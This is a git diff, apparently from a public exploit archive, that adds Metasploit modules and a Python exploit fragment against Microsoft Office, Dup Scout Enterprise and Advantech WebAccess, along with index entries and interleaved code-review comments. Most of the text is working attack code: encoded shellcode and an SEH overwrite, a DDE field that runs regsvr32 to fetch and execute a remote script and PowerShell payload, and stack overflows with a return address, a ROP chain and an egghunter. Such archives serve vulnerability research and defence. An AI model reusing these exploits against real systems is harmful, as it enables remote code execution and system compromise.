+shellcode += "\x45\x4d\x6b\x48\x70\x38\x35\x4d\x72\x42\x76\x31\x78" +shellcode += "\x69\x36\x7a\x35\x6d\x6d\x4d\x4d\x59\x6f\x5a\x75\x37" +shellcode 
+= "\x4c\x53\x36\x33\x4c\x44\x4a\x6f\x70\x59\x6b\x4b\x50" +shellcode += "\x54\x35\x56\x65\x6d\x6b\x43\x77\x72\x33\x62\x52\x30" +shellcode += "\x6f\x51\x7a\x37\x70\x32\x73\x4b\x4f\x59\x45\x41\x41" + +offset = shellcodeTest+"\x41"*(4144-len(shellcodeTest)) +nseh = "\x71\x20" # jno short 34 +nseh += "\x70\x20" # jo short 34 +seh = struct.pack(" 'Microsoft Office DDE Payload Delivery', + 'Description' => %q{ + This module generates an DDE command to place within + a word document, that when executed, will retrieve a HTA payload + via HTTP from an web server. + }, + 'Author' => 'mumbai', + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Oct 9 2017', + 'References' => [ + ['URL', 'https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563'], + ['URL', 'https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/'] + ], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Platform' => 'win', + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => + [ + ['Microsoft Office', {} ], + ], + 'DefaultTarget' => 0, + 'Payload' => { + 'DisableNops' => true + }, + 'DefaultOptions' => { + 'DisablePayloadHandler' => false, + 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', + 'EXITFUNC' => 'thread' + } + )) + register_options([ + OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"]), + OptPath.new("INJECT_PATH", [false, "Path to file to inject", nil]) + ]) + end + + def gen_psh(url, *method) + ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? 
random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#(unknown)')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file) + end + + download_and_run = "#{ignore_cert}#{download_string}" + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + def on_request_uri(cli, _request) + if _request.raw_uri =~ /\.sct$/ + print_status("Handling request for .sct from #{cli.peerhost}") + payload = gen_psh("#{get_uri}", "string") + data = gen_sct_file(payload) + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering payload to #{cli.peerhost}...") + p = regenerate_payload(cli) + data = cmd_psh_payload(p.encoded, + payload_instance.arch.first, + remove_comspec: true, + exec_in_place: true + ) + send_response(cli, data, 'Content-Type' => 'application/octet-stream') + end + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error). + if command == '' + return %{} + # If a command is provided, tell the target system to execute it. + else + return %{} + end + end + + def retrieve_header(filename) + if (not datastore['INJECT_PATH'].nil?) + path = "#{datastore['INJECT_PATH']}" + else + path = nil + end + if (not path.nil?) 
+ if ::File.file?(path) + ::File.open(path, 'rb') do |fd| + header = fd.read(fd.stat.size).split('{\*\datastore').first + header = header.to_s + print_status("Injecting #{path}...") + return header + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + "\n" + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + "\n" + end + return header + end + + def create_rtf + # + header = retrieve_header(datastore['FILENAME']) + field_class = '{\field{\*\fldinst {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid3807165 ' + field_class << "DDEAUTO C:\\\\\\\\Programs\\\\\\\\Microsoft\\\\\\\\Office\\\\\\\\MSword.exe\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe \"/c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\" }}" + field_class << '{\fldrslt }}\sectd \ltrsect\linex0\endnhere\sectlinegrid360\sectdefaultcl\sftnbj {\rtlch\fcs1 \af31507 \ltrch\fcs0' + "\n" + field_class << '\insrsid5790315' + "\n" + field_class << '\par }' + footer = '}}' # footer + rtf = header + field_class + footer + rtf + end + + def primer + file_create(create_rtf) + end +end \ No newline at end of file diff --git a/exploits/windows/remote/43339.rb b/exploits/windows/remote/43339.rb new file mode 100755 index 000000000..436cc0389 --- /dev/null +++ b/exploits/windows/remote/43339.rb 
@@ -0,0 +1,101 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Dup Scout Enterprise Login Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Dup Scout Enterprise + 10.0.18. The buffer overflow exists via the web interface during + login. This gives NT AUTHORITY\SYSTEM access. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Chris Higgins', # msf Module -- @ch1gg1ns + 'sickness' # Original discovery + ], + 'References' => + [ + [ 'EDB', '43145' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d" + }, + 'Targets' => + [ + [ 'Dup Scout Enterprise 10.0.18', + { + 'Ret' => 0x10090c83, # jmp esp - libspp.dll + 'Offset' => 780 + } + ], + ], + 'Privileged' => true, + 'DisclosureDate' => 'Nov 14 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(80)]) + + end + + def check + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + connect + + print_status("Generating exploit...") + + evil = rand_text(target['Offset']) + evil << [target.ret].pack('V') + evil << make_nops(12) + evil << payload.encoded + evil << make_nops(10000 - evil.length) + + vprint_status("Evil length: " + evil.length.to_s) + + sploit = "username=" + sploit << evil + sploit << "&password=" + sploit << rand_text(evil.length) + sploit << "\r\n" + + print_status("Triggering the exploit now...") + + res = send_request_cgi({ + 'uri' => '/login', + 'method' => 'POST', + 'content-type' 
=> 'application/x-www-form-urlencoded', + 'content-length' => '17000', + 'data' => sploit + }) + + handler + disconnect + + end +end \ No newline at end of file diff --git a/exploits/windows/webapps/43340.rb b/exploits/windows/webapps/43340.rb new file mode 100755 index 000000000..47d30ec64 --- /dev/null +++ b/exploits/windows/webapps/43340.rb 
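Review bot: The hard-coded `'content-length' => '17000'` in the login POST does not match the body that is actually sent — `sploit` is `"username="`, a 10000-byte `evil`, `"&password="`, another `rand_text(evil.length)` and `"\r\n"`, so roughly 20 KB — and as far as I can tell neither `'content-length'` nor `'content-type'` is a key the HttpClient mixin reads at the top level of the `send_request_cgi` hash (it computes Content-Length from `'data'` and takes the type from `'ctype'`), so those two entries are at best dead and at worst misleading; drop the length and use `'ctype' => 'application/x-www-form-urlencoded'`. In `check`, `res and res.code == 200 and res.body =~ ...` uses the low-precedence `and`, which works here only because the result is not assigned; `&&` is the idiomatic form. `make_nops(10000 - evil.length)` raises once the encoded payload pushes `evil` past 10000 bytes, and the `'Payload'` hash declares no `'Space'`, so that limit should be stated in the metadata rather than discovered at run time.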
@@ -0,0 +1,141 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = GoodRanking + + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Egghunter + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Advantech WebAccess 8.2. + By sending a specially crafted DCERPC request, an attacker could overflow + the buffer and execute arbitrary code. + }, + 'Author' => [ 'mr_me ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'ZDI', '17-938' ], + [ 'CVE', '2017-14016' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 2048, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', + { + 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 + 'Slide' => 0x07048f5b, # retn + 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 + } + ], + ], + 'DisclosureDate' => 'Nov 02 2017', + 'DefaultTarget' => 0)) + register_options([ Opt::RPORT(4592)]) + end + + def create_rop_chain() + + # this target opts into dep + rop_gadgets = + [ + 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] + 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] + 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] + 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] + 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] + 0x07024822, # & push esp # ret [BwPAlarm.dll] + 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] + 0xffffffff, # Value to negate, will become 0x00000001 + 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] + 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] + 
rand_text_alpha(4).unpack('V'), + rand_text_alpha(4).unpack('V'), + rand_text_alpha(4).unpack('V'), + 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] + 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) + 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] + 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] + 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] + 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] + 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] + rand_text_alpha(4).unpack('V'), + rand_text_alpha(4).unpack('V'), + 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] + 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] + 0x90909090, # nop + 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] + ].flatten.pack("V*") + return rop_gadgets + end + + def exploit + connect + handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) + print_status("Binding to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + + # send the request to get the handle + resp = dcerpc.call(0x4, [0x02000000].pack('V')) + handle = resp.last(4).unpack('V').first + print_good("Got a handle: 0x%08x" % handle) + egg_options = { :eggtag => "0day" } + egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) + + # apparently this is called a ret chain + overflow = [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Jmp']].pack('V') + overflow << [target['Ret']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow 
<< [target['Slide']].pack('V') + overflow << create_rop_chain() + overflow << egghunter + overflow << egg + overflow << rand_text_alpha(0x1000-overflow.length) + + # sorry but I dont like msf's ndr class. + sploit = [handle].pack('V') + sploit << [0x000138bd].pack('V') # opcode we are attacking + sploit << [0x00001000].pack('V') # size to copy + sploit << [0x00001000].pack('V') # size of string + sploit << overflow + print_status("Trying target #{target.name}...") + begin + dcerpc_call(0x1, sploit) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse + ensure + disconnect + end + handler + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4de84c0fa..9e66678ab 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
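Review bot: `handle` in `exploit` is assigned twice with two different meanings — first the endpoint string returned by `dcerpc_handle`, which the bind and the two `print_status` lines use, then the 4-byte value unpacked from the opcode-4 response that is packed into `sploit` — which makes `print_good("Got a handle: ...")` and the `sploit` construction hard to read; rename the second one, e.g. `ctx_handle = resp.last(4).unpack('V').first`. The empty `rescue Rex::Proto::DCERPC::Exceptions::NoResponse` silently swallows the exception, so it needs a comment saying why no response is the expected outcome at that point (presumably the call does not return normally after the overflow), e.g. `# NoResponse is expected here; fall through to the handler`. Style: the two requests in the same method go through `dcerpc.call(0x4, ...)` and `dcerpc_call(0x1, ...)` respectively — pick one form — and `def create_rop_chain()` keeps empty parentheses, which is not idiomatic Ruby; the comment `# apparently this is called a ret chain` should either explain what the repeated `Slide` entries are for or be removed.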
@@ -16023,11 +16023,16 @@ id,file,description,date,author,type,platform,port 43195,exploits/windows/remote/43195.py,"HP iMC Plat 7.2 - Remote Code Execution",2017-11-28,"Chris Lyne",remote,windows, 43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443 43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows, +43202,exploits/windows/remote/43202.py,"Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)",2017-11-29,"Miguel Mendez Z",remote,windows, 43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80 43226,exploits/cgi/remote/43226.py,"LaCie 5big Network 2.2.8 - Command Injection",2017-12-07,"Timo Sablowski",remote,cgi, 43230,exploits/unix/remote/43230.rb,"Polycom Shell HDX Series - Traceroute Command Execution (Metasploit)",2017-12-07,Metasploit,remote,unix,23 43231,exploits/windows/remote/43231.py,"Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Traversal",2017-12-07,tintinweb,remote,windows, 43236,exploits/windows/remote/43236.py,"LabF nfsAxe FTP Client 3.7 - Buffer Overflow (DEP Bypass)",2017-12-08,wetw0rk,remote,windows,21 +43338,exploits/windows/remote/43338.rb,"Microsoft Office - DDE Payload Delivery (Metasploit)",2017-12-14,Metasploit,remote,windows, +43339,exploits/windows/remote/43339.rb,"Dup Scout Enterprise - Login Buffer Overflow (Metasploit)",2017-12-14,Metasploit,remote,windows, +43341,exploits/php/remote/43341.rb,"pfSense 2.4.1 - CSRF Error Page Clickjacking (Metasploit)",2017-12-14,Metasploit,remote,php, +43342,exploits/hardware/remote/43342.txt,"Palo Alto Networks Firewalls - Remote root Code Execution",2017-12-14,"Philip Pettersson",remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -38360,4 +38365,12 @@ id,file,description,date,author,type,platform,port 43316,exploits/php/webapps/43316.txt,"Vanguard 1.4 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, 43323,exploits/php/webapps/43323.txt,"Joomla! Component JBuildozer 1.4.1 - 'appid' SQL Injection",2017-12-12,"Ihsan Sencan",webapps,php,80 43324,exploits/php/webapps/43324.txt,"Accesspress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload",2017-12-12,"Colette Chamberland",webapps,php,80 +43329,exploits/php/webapps/43329.txt,"Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection",2017-12-13,"Ihsan Sencan",webapps,php, +43330,exploits/php/webapps/43330.txt,"Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection",2017-12-13,"Ihsan Sencan",webapps,php, 43332,exploits/cgi/webapps/43332.txt,"Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read",2017-12-13,"Jakub Palaczynski",webapps,cgi,443 +43333,exploits/php/webapps/43333.txt,"Readymade Video Sharing Script 3.2 - HTML Injection",2017-12-14,"Ihsan Sencan",webapps,php, +43334,exploits/php/webapps/43334.txt,"Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php, +43335,exploits/php/webapps/43335.html,"FS Lynda Clone 1.0 - SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php, +43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php, +43337,exploits/php/webapps/43337.txt,"Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection",2017-12-14,Akityo,webapps,php, +43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592